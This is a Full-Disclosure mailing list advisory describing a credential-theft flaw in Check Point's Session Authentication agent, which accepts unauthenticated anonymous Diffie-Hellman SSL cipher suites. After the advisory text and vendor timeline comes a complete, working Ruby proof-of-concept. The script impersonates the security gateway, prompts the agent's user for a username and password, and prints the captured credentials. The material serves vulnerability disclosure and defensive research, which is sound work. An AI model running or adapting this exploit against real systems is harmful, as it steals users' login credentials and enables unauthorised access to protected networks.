-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Product Information - -------------------
Check Point Session Authentication agent is a service that is installed on
endpoint system in order to communicate with security gateway and allow it to
request and obtain user's credentials. Session Authentication is a part of
Legacy Authentication suite which provides different authentication methods to
allow or deny access to network resources.
R76 Security Gateway Technical Administration Guide[1] defines typical Session
Authentication operation in the following way:
1. The user initiates a connection directly to the server
2. The Security Gateway intercepts the connection
3. The Session Authentication agent challenges the user for authentication
data and returns this information to the gateway
4. If the authentication is successful, the Security Gateway allows the
connection to pass through the gateway and continue to the target server
Issue description
- -----------------
Check Point Session Authentication agent version 4.1 and higher contains a flaw
which is caused by lack of peer authentication in SSL communication. Encrypted
communication between agent and security gateway has been introduced due to
several issues (e.g. [2], [3]) which were revealed in the previous versions
(4.0 and lower) of the product. Research showed that it is still possible to
exploit previously known vulnerabilities - gateway impersonation and credential
stealing - even though communication between agent and security gateway is
utilizing SSL.
Communication between Session Authentication agent and security gateway is
performed using proprietary protocol. Since version 4.1 this communication
scheme uses SSL as an underlying protocol to enable encryption of both protocol
commands and user provided data. When SSL communication is negotiated between
gateway and agent following cipher suites are visible in SSL Client Hello
message as supported by Session Authentication agent:
TLS_DH_anon_EXPORT_WITH_RC4_40_MD5
TLS_DH_anon_WITH_RC4_128_MD5
TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA
TLS_DH_anon_WITH_DES_CBC_SHA
TLS_DH_anon_WITH_3DES_EDE_CBC_SHA
RFC2246 refers to listed cipher suites:
"The following cipher suites are used for completely anonymous
Diffie-Hellman communications in which neither party is
authenticated. Note that this mode is vulnerable to man-in-the-middle
attacks and is therefore deprecated."
Taking into account above information it's possible to connect to Session
Authentication agent from attacker's machine, initiate SSL-based communication,
pass SSL handshake without being authenticated and use encrypted channel to
control agent (e.g. prompt user for login and password).
For attack to be successful attacker's machine must be allowed to connect to
machine on which agent is running. Newer versions of Session Authentication
agent include option to define three IP addresses which are allowed to issue
authentication requests to agent. When this option is used it limits possibility
of exploitation. Agent software has also "Allow any IP" option - when enabled
attacker doesn't need to take additional measures in order to be able to connect
to agent.
Proof of Concept
- ----------------
Attached PoC script simulates security gateway and allows credential stealing to
be performed over encrypted communication channel against Session Authentication
agent version 4.1 or higher.
Affected versions
- -----------------
Check Point Session Authentication agent, version 4.1 and higher
Vendor response
- ---------------
Vendor has been informed about the issue on 8/8/2013. On 14/8/2013 vendor
informed about expected fix date: 15/10/2013. On 28/10/2013 vendor informed that
due to small user base and introduction of the Identity Awareness Software
Blade[4] legacy session authentication will be deprecated in the major release
of 2014.
Additionally vendor published SecureKnowledge article[5].
Credits
- -------
It should be noted that this finding is partially based on work of
individuals who reported issues in the previous versions of Session
Authentication agent as referenced in [2] and [3].
References
- ----------
[1] https://sc1.checkpoint.com/documents/R76/CP_R76_SGW_WebAdmin/6721.htm
[2] http://www.securityfocus.com/bid/1661/info
[3] http://osvdb.org/show/osvdb/84985
[4] https://www.checkpoint.com/products/identity-awareness-software-blade/
[5]
https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk98263
-----BEGIN PGP SIGNATURE-----
Version: GnuPG/MacGPG2 v2.0.20 (Darwin)
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
iQIcBAEBAgAGBQJS5tZHAAoJEO2gMNQgkP1iucwP/3ruK6iKIm6FvQ6DJsCVFMn1
98iWrXvU5jG0krKERu2Q2L3EkElvfq4reSeceIuVqpS20v69cCHCMKofFVaFeK2a
0Bo2zIqjnAr/T2/7DYwI1dgdZE4SAzcEscqeA8Zh6Hi04wME+sJpYxsq0lb7u2jY
FuuqbUo5R4Y2hGXNoc0wKhiVhrOJ10DhvZaug+wbenX3721v+QqYzS+PUnql1WG3
4sSevvZM5Plb+aRhw6i4il/5UnwoWRW97YFL40AUgo/6JRClPInNdCSDiqXyLv50
riEe8g97mPf0EKjaaWD06iXuiVgA0rmcz9OzERnhmTtf0p8jdK/PVReDcyY6+68e
DkeI/XRvsGQHP03fDSQaxlij/ZicXWcDfUwZyMEA8gEMg+0eaZ1OLdHrw8QWWoET
0XGfZ1jTVF9Df3sxmpXXIXH5kwjgDejR1JHap8vJqByPA6TBZI1Z7mCbqoR84b+Y
9jg8m5unGuEZTXQqJp50pDh+N/50zZ1YZVGDis2/5Vj0r2IXP3jse3RcjyC9kmgL
edAh63OiP7/PvVebJRR7d9VUb9ECAbX0FBy6zc7DDvE7bveyYRlNDsLucDKH/x3S
zAk7vupt3509tIOjBNrQM6kfiyWrJvrD59g8CidcjKD8+eiE44x17bwl6F1pXFT3
U4O8HMnMbOPUDugf3Nua
=1P5f
-----END PGP SIGNATURE-----
#!/usr/bin/env ruby
#
# PoC for classic bug (Bugtraq ID 1661) in Check Point Session Authentication
# Agent - this time, however, credentials can be stolen even when Session
# Authentication Agent doesn't allow for clear-text communication.
#
# Document RFC2246 describes weaknesses of cipher suites used in this product.
#
# Attacker's host still needs to be defined as "Allowed FireWall-1" on Session
# Authentication Agent side.
#
# PoC has been tested with the following products:
# * FireWall-1 Authentication Agent NG (v5.0?)
# * SecurePlatform R75 gateway
#
# Use at your own risk. I hold no responsibility for use or misuse of this
# code.
#
# by <jozwi...@gmail.com>
#
require 'socket'
require 'openssl'
require 'ipaddr'
require 'optparse'
# Command line options
options = {}
optparse = OptionParser.new do |opts|
opts.banner = "Usage #{opts.program_name}.rb [options] TARGET"
opts.set_summary_width(52)
options[:sslport] = 10443
opts.on(
'-p',
'--port SSLPORT',
'Define the port on which SSL server will run (default: localhost:10443)'
) do |o|
options[:sslport] = o
end
options[:connection] = false
opts.on(
'-c',
'--connection srcip,srcport,dstip,dstport,proto',
Array,
'Present user with details of connection for which auth is pending'
) do |o|
options[:connection] = o
end
options[:fwname] = "FW-1"
opts.on(
'-f',
'--fwname NAME',
'Define the name of firewall presented to user (default: FW-1)'
) do |o|
options[:fwname] = o
end
opts.on('-h', '--help', 'Display help') do
print opts
exit
end
end
# Parse options, leave TARGET in ARGV[0]
optparse.parse!
if !ARGV[0]
print "[-] Please define target host.\n"
print optparse
exit
end
# Pass data between sockets
def clone(src,dst)
buf = src.recv(1024)
dst.write(buf)
return buf.size
end
# Print collected credentials
def cred(u,p)
print "[+] Username: #{u}\n[+] Password: #{p}\n" if u
end
@username = nil
@password = nil
# Prepare connection array. Transform dotted decimal IPs to long
if options[:connection]
if options[:connection].size == 5
# Src IP to Long
options[:connection][0] = IPAddr.new(options[:connection][0]).to_i
# Dst IP to Long
options[:connection][2] = IPAddr.new(options[:connection][2]).to_i
else
print "[-] Something's wrong with '-c' option.\n"
exit
end
end
# Initialize SSL server, run on localhost
begin
server = TCPServer.new("127.0.0.1",options[:sslport])
rescue Errno::EADDRINUSE
print "[-] Not able to bind SSL server, try to use different port.\n"
exit
rescue Exception => e
print "[-] Exception: #{e}\n"
exit
end
sslcontext = OpenSSL::SSL::SSLContext.new
sslserver = OpenSSL::SSL::SSLServer.new(server, sslcontext)
# Define cipher suites for SSL server
# Below are cipher suites supported by Session Authentication Agent
sslcontext.ciphers = [
# TLS_DH_anon_EXPORT_WITH_RC4_40_MD5
["EXP-ADH-RC4-MD5", "TLSv1/SSLv3", 40, 128],
# TLS_DH_anon_WITH_RC4_128_MD5
["ADH-RC4-MD5", "TLSv1/SSLv3", 128, 128],
# TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA
["EXP-ADH-DES-CBC-SHA", "TLSv1/SSLv3", 40 , 128],
# TLS_DH_anon_WITH_DES_CBC_SHA
["ADH-DES-CBC-SHA", "TLSv1/SSLv3", 56 , 56],
# TLS_DH_anon_WITH_3DES_EDE_CBC_SHA
["ADH-DES-CBC3-SHA", "TLSv1/SSLv3", 168, 168]
]
# Initialize socket for connection to Session Authentication Agent
# Session Authentication Agent always runs on TCP/261
begin
sock_sagnt = TCPSocket.new(ARGV[0], 261)
rescue Errno::EHOSTUNREACH
print "[-] Session Agent host is not reachable.\n"
exit
rescue Errno::ETIMEDOUT
print "[-] Connection to Session Agent service timed out.\n"
exit
rescue Exception => e
print "[-] Exception: #{e}\n"
exit
end
# Initialize socket for connection to SSL server
sock_server = TCPSocket.new("127.0.0.1", options[:sslport])
# Run SSL server thread
Thread.new {
begin
sslconn = sslserver.accept
sslconn.syswrite(
"220 FW-1 Session Authentication Request from #{options[:fwname]}\n"
)
sslconn.syswrite(
"211 #{options[:connection][0]} #{options[:connection][1]} " +
"#{options[:connection][2]} #{options[:connection][3]} " +
"#{options[:connection][4]}\n"
) if options[:connection]
sslconn.syswrite("331 User:\n")
@username = sslconn.sysread(1024).chop!
sslconn.syswrite("331 *Password:\n")
@password = sslconn.sysread(1024).chop!
sslconn.syswrite(
"200 User #{@username} authenticated by FireWall-1 authentication.\n" +
"230 OK.\n"
)
sslconn.close
rescue EOFError
cred(@username,@password)
print "[S] EOFError - User clicked 'Cancel'?\n"
exit
rescue Exception => e
cred(@username,@password)
print "[S] Exception: #{e}\n"
exit
end
}
begin
# Initiate SSL-based auth
sock_sagnt.write(
"220 FW-1 Session Authentication Request from #{options[:fwname]}\n"
)
sock_sagnt.write("201 131072\n")
sock_sagnt.write(
"211 #{options[:connection][0]} #{options[:connection][1]} " +
"#{options[:connection][2]} #{options[:connection][3]} " +
"#{options[:connection][4]}\n"
) if options[:connection]
sock_sagnt.write("331 User:\n")
# Check for Session agent error message
buf = sock_sagnt.recv(1024)
if buf =~ /431/
print "[-] Session Agent error - probably older version. " +
"Try clear text credential stealing\n"
exit
end
print "[+] Session Agent supports SSL\n"
sock_sagnt.write("202 \n")
print "[+] SSL/TLS Exchange will follow\n"
size = clone(sock_sagnt,sock_server)
print "[+]_ #{size} bytes: Session Agent >>> Server\n" +
" \\_ SSL Client Hello\n"
size = clone(sock_server,sock_sagnt)
print "[+]_ #{size} bytes: Server >>> Session Agent\n" +
" \\_ TLSv1 Server Hello, Server Key Exchange, Server Hello Done\n"
size = clone(sock_sagnt,sock_server)
print "[+]_ #{size} bytes: Session Agent >>> Server\n " +
"\\_ TLSv1 Client Key Exchange, Change Cipher Spec, Encrypted Handshake\n"
size = clone(sock_server,sock_sagnt)
print "[+]_ #{size} bytes: Server >>> Session Agent\n " +
"\\_ TLSv1 Change Cipher Spec, Encrypted Handshake\n"
# SSL/TLS handshake ends, send application data. Server will start
size = clone(sock_server,sock_sagnt)
print "[+]_ #{size} bytes: Server >>> Session Agent\n" +
" \\_ Session Authentication: 220 + 211 + 331 User\n"
size = clone(sock_sagnt,sock_server)
print "[+]_ #{size} bytes: Session Agent >>> Server\n" +
" \\_ Session Authentication: username\n"
size = clone(sock_server,sock_sagnt)
print "[+]_ #{size} bytes: Server >>> Session Agent\n" +
" \\_ Session Authentication: 331 Password message\n"
size = clone(sock_sagnt,sock_server)
print "[+]_ #{size} bytes: Session Agent >>> Server\n" +
" \\_ Session Authentication: password\n"
# Send confirmation to Session Agent that authentication is successful
size = clone(sock_server,sock_sagnt)
print "[+]_ #{size} bytes: Server >>> Session Agent\n" +
" \\_ Session Authentication: 200 + 230 message\n"
rescue Errno::ECONNRESET => e
print "[-] Connection reset by peer. Error: #{e}\n"
exit
rescue Errno::EPIPE => e
print "[-] Broken pipe. Error: #{e}\n"
exit
end
cred(@username,@password)
sock_sagnt.close
sock_server.close
snauth-ssl.rb.sig
Description: Binary data
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
